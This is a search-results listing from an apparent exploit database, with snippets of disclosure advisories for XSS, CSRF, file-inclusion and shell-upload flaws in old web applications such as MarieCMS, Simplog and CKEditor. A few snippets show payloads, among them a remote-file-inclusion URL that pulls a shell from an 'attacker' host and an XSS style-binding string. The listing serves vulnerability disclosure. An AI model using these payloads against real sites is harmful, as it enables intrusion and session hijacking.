7644 matches found
oBlog - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Brute Force
Application: oBlog Version: the only one there is : Download: http://www.dootzky.com/images/projects/oBlog.zip Author of this full disclosure: Milos Zivanovic Vulnerabilities: Persistent XSS, CSRF,...
Viscacha 0.8 Gold persistent XSS vulnerability
No description provided by source. Viscacha 0.8 Gold persistent XSS vulnerability Found By: mrme Download: http://www.viscacha.org/ Tested On: Windows Vista Note: For educational purposes only POC Info: A regular user of the board can embed javascript code that could be executed within the contex...
Viscacha 0.8 Gold - Persistent Cross-Site Scripting
Viscacha 0.8 Gold persistent XSS vulnerability Found By: mrme Download: http://www.viscacha.org/ Tested On: Windows Vista Note: For educational purposes only POC Info: A regular user of the board can embed javascript code that could be executed within the context of the admin's browser. If the us...
MarieCMS v0.9 LFI, RFI, and XSS Vulnerabilities
Exploit for unknown platform in category web applications MarieCMS v0.9 LFI, RFI, and XSS Vulnerabilities OVERVIEW MarieCMS v0.9 vulnerable to following issues: ++ Remote File Inclusion ++ Local File...
MarieCMS 0.9 - Local File Inclusion Remote File Inclusion Cross-Site Scripting
MarieCMS 0.9 - Local File Inclusion Remote File Inclusion Cross-Site Scripting OVERVIEW MarieCMS v0.9 vulnerable to following issues: ++ Remote File Inclusion ++ Local File Inclusion ++ Persistent XSS ++ Shell Upload Authenticated User PoC Remote File Inclusion: ++++++++++++++++++++++++...
Barracuda IMFirewall 620 Vulnerability
No description provided by source. PenTest Information: ==================== GESEC Team remove discover multiple Input Validation Vulnerabilities on Barracuda IM Firewall. A remote attacker is able to get sensitive customer sessions client-side or can implement evil script routines & malicious...
MarieCMS v0.9 LFI RFI and XSS Vulnerabilities
No description provided by source. OVERVIEW MarieCMS v0.9 vulnerable to following issues: ++ Remote File Inclusion ++ Local File Inclusion ++ Persistent XSS ++ Shell Upload Authenticated User PoC Remote File Inclusion: ++++++++++++++++++++++++...
MarieCMS 0.9 LFI / RFI / XSS
Multiple Vulnerabilities in MarieCMS v0.9 Name Multiple vulnerabilities in MarieCMS Systems Affected MarieCMS v0.9 Download http://sourceforge.net/projects/mariecms/files/MarieCMS/MarieCMS%200.9/mariecmsv0.9.zip/download Author Amol Naik amolnaik4atgmail.com Date 07/12/2009 OVERVIEW MarieCMS v0.9...
Chipmunk Newsletter Persistent XSS Vulnerability
Exploit for unknown platform in category web applications Chipmunk Newsletter Persistent XSS Vulnerability Tested On: Windows Vista Note: For educational purposes only There’s probably a lot more...
MarieCMS 0.9 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting
OVERVIEW MarieCMS v0.9 vulnerable to following issues: ++ Remote File Inclusion ++ Local File Inclusion ++ Persistent XSS ++ Shell Upload Authenticated User PoC Remote File Inclusion: ++++++++++++++++++++++++ http://server/mariecms/?page=http://attacker/site/shell.txt? Local File Inclusion:...
Simplog 0.9.3.2 XSS / XSRF
Multiple Vulnerabilities in Simplog v0.9.3.2 Name Multiple vulnerabilities in Simplog Systems Affected Simplog 0.9.3.2 and possibly earlier versions Download http://sourceforge.net/projects/simplog/files/simplog/0.9.3.2/simplog-0.9.3.2.tar.gz/download Author Amol Naik amolnaik4atgmail.com Date...
Simplog v0.9.3.2 Multiple Vulnerabilities
Exploit for unknown platform in category web applications Simplog v0.9.3.2 Multiple Vulnerabilities Multiple Vulnerabilities in Simplog v0.9.3.2 Name Multiple vulnerabilities in Simplog Systems Affected Simplog...
Simplog 0.9.3.2 - Multiple Vulnerabilities
Simplog 0.9.3.2 - Multiple Vulnerabilities Multiple Vulnerabilities in Simplog v0.9.3.2 Name Multiple vulnerabilities in Simplog Systems Affected Simplog 0.9.3.2 and possibly earlier versions Download http://sourceforge.net/projects/simplog/files/simplog/0.9.3.2/simplog-0.9.3.2.tar.gz/download...
Simplog 0.9.3.2 - Multiple Vulnerabilities
Multiple Vulnerabilities in Simplog v0.9.3.2 Name Multiple vulnerabilities in Simplog Systems Affected Simplog 0.9.3.2 and possibly earlier versions Download http://sourceforge.net/projects/simplog/files/simplog/0.9.3.2/simplog-0.9.3.2.tar.gz/download Author Amol Naik amolnaik4atgmail.com Date...
CGI Generic XSS (persistent)
The remote web server hosts one or more CGI scripts that fail to adequately sanitize request strings containing malicious JavaScript. By leveraging this issue, an attacker may be able to cause arbitrary HTML and script code to be executed in a user's browser within the security context of the...
Achievo < 1.4.0 Multiple Vulnerabilities
Binary data 5208.prm...
[BONSAI] XSS in Achievo - Customized XSS payload included
Bonsai Information Security - Advisory http://www.bonsai-sec.com/research/ Multiple XSS in Achievo 1. Advisory Information Title: Multiple XSS in Achievo Advisory ID: BONSAI-2009-0101 Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txt Date published:...
Achievo Cross Site Scripting
Bonsai Information Security - Advisory http://www.bonsai-sec.com/research/ Multiple XSS in Achievo 1. Advisory Information Title: Multiple XSS in Achievo Advisory ID: BONSAI-2009-0101 Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txt Date published:...
XSS and Content Spoofing vulnerabilities in CKEditor
Hello 3APA3A! I want to warn you about Cross-Site Scripting and Content Spoofing vulnerabilities in CKEditor. XSS: This is a Persistent XSS vulnerability. The attack is conducted by placing a link with a style set. a href="http://test"...
XSS and Content Spoofing vulnerabilities in FCKeditor
Hello 3APA3A! I want to warn you about Cross-Site Scripting and Content Spoofing vulnerabilities in FCKeditor. XSS: This is a Persistent XSS vulnerability. The attack is conducted by placing a link with a style set. a href="http://test" style="-moz-binding:url'http://site/xss.xmlxss'"test/a This...